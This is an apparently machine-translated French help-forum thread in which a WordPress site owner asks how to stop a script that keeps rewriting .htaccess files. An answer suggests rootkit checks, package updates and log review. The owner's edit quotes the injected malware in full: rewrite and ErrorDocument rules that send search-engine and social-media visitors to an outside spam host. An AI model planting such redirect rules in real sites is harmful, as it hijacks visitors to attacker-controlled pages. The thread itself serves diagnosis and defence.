Comparez les prix des domaines et des services informatiques des vendeurs du monde entier

Le script malveillant change de fichiers .htaccess sur le serveur

Dupliquer possible:

https://serverfault.com/questi ... gency
Il semble qu'il existe un script malveillant qui fait appel à mes fichiers de mon serveur et d'édition .htaccess Pour tous mes sites postés pour rediriger les liens de spam.

Comment mieux l'empêcher?

J'ai changé les données d'accès au serveur pour le panneau de commande et l'accès FTP, et essayé de mettre à jour les fichiers existants .htaccess Avec l'aide du code suivant, mais cela change toujours.

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

# protect wp-config.php
<files wp-config.php="">
Order deny,allow
Deny from all
</files>

# Protect the htaccess file
<files .htaccess="">
order allow,deny
deny from all
</files>

# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

Que pourrait aider d'autre?

Désolé pour le manque d'informations, je suis nouveau aux serveurs, etc., donc, si des informations supplémentaires sont nécessaires, il suffit de crier!

Merci d'avance pour toute aide.

Dan

******* ÉDITER *******

Malware .htaccess sur demande

<ifmodule mod_rewrite.c="">    
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ [url=http://byidelement.ru/ruby/index.php]http://byidelement.ru/ruby/index.php[/url] [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ [url=http://byidelement.ru/ruby/index.php]http://byidelement.ru/ruby/index.php[/url] [R=301,L]
</ifmodule>

# STRONG HTACCESS PROTECTION
<files "^.*\.([hh][tt][aa])"="" ~="">
order allow,deny
deny from all
satisfy all
</files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
ErrorDocument 400 [url=http://byidelement.ru/ruby/index.php]http://byidelement.ru/ruby/index.php[/url]
ErrorDocument 401 [url=http://byidelement.ru/ruby/index.php]http://byidelement.ru/ruby/index.php[/url]
ErrorDocument 403 [url=http://byidelement.ru/ruby/index.php]http://byidelement.ru/ruby/index.php[/url]
ErrorDocument 404 [url=http://byidelement.ru/ruby/index.php]http://byidelement.ru/ruby/index.php[/url]
ErrorDocument 500 [url=http://byidelement.ru/ruby/index.php]http://byidelement.ru/ruby/index.php[/url]
Invité:

Emilie

Confirmation de:

Courir
http://www.chkrootkit.org/
Rapidement, juste au cas où.

Assurez-vous que tous les packages sont mis à jour avec des correctifs de sécurité:

Ubuntu / Debian:

apt-get update; apt-get dist-upgrade

CentOS / Fedora / RHEL:

yum upgrade

Il est probable que c'est un exploit célèbre dans la version Wordpress (ou tout autre environnement fini), Que vous utilisez, et maintenant on constate qu'il est à nouveau utilisé à distance. Si tel est le cas, recherchez la dernière version de tous les cadres que vous utilisez et vérifiez les corrections de sécurité.

En supposant que cela fonctionne à distance, il peut être confirmé en recevant

tail

Lancé sur un serveur Web, accès aux journaux et suivi de toute activité suspecte.

tail -f /var/log/apache2/access-log

sera une commande avec une installation standard Ubuntu, Mais toutes les distributions placent leurs magazines Apache à différents endroits. Quand vous voyez quelque chose de suspect, vous apprendrez quoi VirtualHost C'était piraté. Si vous aimez l'aventure, regardez vos journaux d'accès historiques. Cela peut sembler une tâche stimulante sur un serveur de trafic élevé, mais montrera le point d'attaque. Suggérez la zone de recherche, de commencer la recherche à propos du temps où vous savez ce que la première attaque s'est produite.

Pour répondre aux questions, connectez-vous ou registre